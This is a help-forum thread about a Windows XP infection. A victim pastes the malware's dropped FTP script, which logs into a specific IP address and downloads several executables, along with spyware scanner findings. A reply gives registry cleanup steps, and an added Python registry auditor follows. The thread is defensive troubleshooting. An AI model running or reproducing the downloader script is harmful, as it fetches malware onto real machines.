Internet Explorer doesn't upload after viruses/trojans infected my computer...

barb

I'm using windows XP. While I was browsing some site (not a porn
one..), suddenly my computer froze up. I disconnected from the
internet, and saw various files have been added to my computer. I
opened one of the files that got in, a file named 0 (in windows\system32),
and got this:

open 207.58.159.14
tmpacct
12345
bin
get julie.exe
get newdevin.exe
get IF01.exe
get istinstall_154074.exe
get sd.exe
get sdmsg.exe
get TVM_B5.EXE
get 06wu29rd.exe
get dp807615.exe
bye

I tried to run Adaware, it froze halfway through, so I ran it again
and before it froze again I aborted, and was able to delete what it
found when I aborted–
Hkey_classes_root:CLSID\{5F1ABCDB-A875-46c1-8345-B72A4567E486}
After that, internet explorer wouldn't launch…

I ran Spybot, it found several problems, when I clicked the fix
problem button, it froze.

Now I cannot launch Internet Explorer – the whole computer freezes up.
I'm writing here using Netscape, and would really like to be able to
use my explorer again. HELP…. You're my only hope practically…
How can I fix this? Should I change something in the registry?

BTW, the problems spybot found (which I'm unable to fix since the
program freezes) are:

Avenue A, Inc.: Tracking cookie (Internet Explorer: MYNAME) (Cookie, nothing done)

BookedSpace: Browser helper object (Registry key, nothing done)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9}

BookedSpace: Class ID (Registry key, nothing done)
HKEY_CLASSES_ROOT\CLSID\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9}

BookedSpace: Root class (Registry key, nothing done)
HKEY_CLASSES_ROOT\BookedSpace.Extension.5

BookedSpace: Root class (Registry key, nothing done)
HKEY_CLASSES_ROOT\BookedSpace.Extension

BookedSpace: Settings (Registry key, nothing done)
HKEY_CLASSES_ROOT\AppID\BookedSpace.DLL

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-21-2237029002-4258192708-1256799619-1004\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing done)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3
 
Juan

Disconnect the computer from the wire connection to the Internet.
Start your computer in safe mode to positively delete the spyware with
Spybot and Adaware. Before running both programs, delete the
cookies with the buttons in IExplorer\Tools\Internet Options\General.
Also delete the Temporary Internet Files with the button next to Delete
Cookies.
Press Ctrl+Alt+Del simultaneously and select the Processes tab. Any process
taking most of the memory (with all programs closed) is most likely the
trojan-hijacker-malware. Select it, click End Process, and run the
anti-spyware programs.

A description of the Safe Mode Boot Options in Windows XP
http://support.microsoft.com/default.aspx?scid=kb;en-us;315222&Product=winxp

If the problem with the programs should be repeated (rare possibility)
and you are unable to delete the spyware, go into the registry and delete
the parasites by hand. Go to Start\Run\regedit.msc and hit Enter.

Delete the keys the programs detected (those you mentioned) except for
the ones from the DSO Exploit.
For the keys about the DSO Exploit, you have to consider this:
The DSO Exploit vulnerability was patched by Microsoft. IF you have kept
your system updated, the Spybot reading is probably a false reading.
IF you have not kept your system updated, the reading is probably TRUE
and you must delete the keys.
One more thing to consider is that the 1004 entry must be a REG_DWORD and
not an alphanumeric value (REG_SZ). If it is a REG_SZ, delete it and create a new
REG_DWORD with the same name, 1004, and set it to 0.

Next go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Run and Run-. Both should only have the predetermined alphanumeric value.

Next go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run\ should have the predetermined alphanumeric value and a few other
alphanumeric values set there by the antivirus. Any other values here should
be considered malicious and should be deleted unless you have installed some
program that is set to run at startup.
And Run-\ should only have the predetermined alphanumeric value and any other
value from a program you could have installed. If there is something else
there, delete it.


Before you try anything, install this program and see if it does the job. Run it
in safe mode.
CoolWWWSearch SmartKiller MiniRemoval
http://www.spychecker.com/program/miniremovalcw.html
removes CoolWebSearch hijackers.

Spybot Search & Destroy (free)
http://www.safer-networking.net/

Lavasoft AdAware SE (free)
http://www.lavasoft.de

SpywareBlaster (free)
http://www.javacoolsoftware.com/spywareblaster.html
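
An added example, not part of the thread: the two manual registry checks described in the reply above (the type of the 1004 value under Zones\0, and unexpected values under Run / Run-), run against the text produced by a registry export instead of by eye in regedit. The sample export, the value names ExampleAV and updt, and the known_startup allowlist are constructed for illustration.

```python
import re

# Constructed sample in the text format of a regedit / "reg export" file.
# Real version 5.00 exports are UTF-16; read them with encoding="utf-16".
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"="3"
"1200"=dword:00000000

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1004"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
@=""
"ExampleAV"="C:\\Program Files\\ExampleAV\\av.exe"
"updt"="C:\\WINDOWS\\system32\\example.exe"
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VAL_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')

def parse_reg(text):
    """Yield (key, value_name, type, data) for every value in the export."""
    key = None
    for line in (l.strip() for l in text.splitlines()):
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VAL_RE.match(line)
        if not m or key is None:
            continue  # header, blank line, or hex continuation line
        name = '' if m.group(1) == '@' else m.group(1)[1:-1]  # '' = (Default)
        raw = m.group(2)
        if raw.startswith('"'):
            yield key, name, 'REG_SZ', re.sub(r'\\(.)', r'\1', raw[1:-1])
        elif raw.startswith('dword:'):
            yield key, name, 'REG_DWORD', int(raw[6:], 16)
        else:
            yield key, name, 'OTHER', raw  # hex(...) types left undecoded

def audit(text, known_startup=()):
    """Flag a non-DWORD 1004 and startup values not on the allowlist."""
    findings = []
    for key, name, typ, data in parse_reg(text):
        k = key.lower()
        if k.endswith(r'\internet settings\zones\0') and name == '1004':
            if typ != 'REG_DWORD':
                findings.append(('1004-not-dword', key, name, typ))
        elif k.endswith((r'\currentversion\run', r'\currentversion\run-')):
            if name and name not in known_startup:
                findings.append(('unreviewed-startup', key, name, data))
    return findings
```

Each finding is a tuple of (check, key, value name, detail); a startup finding only means the value is not on the allowlist you passed in, so review it before deleting anything.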


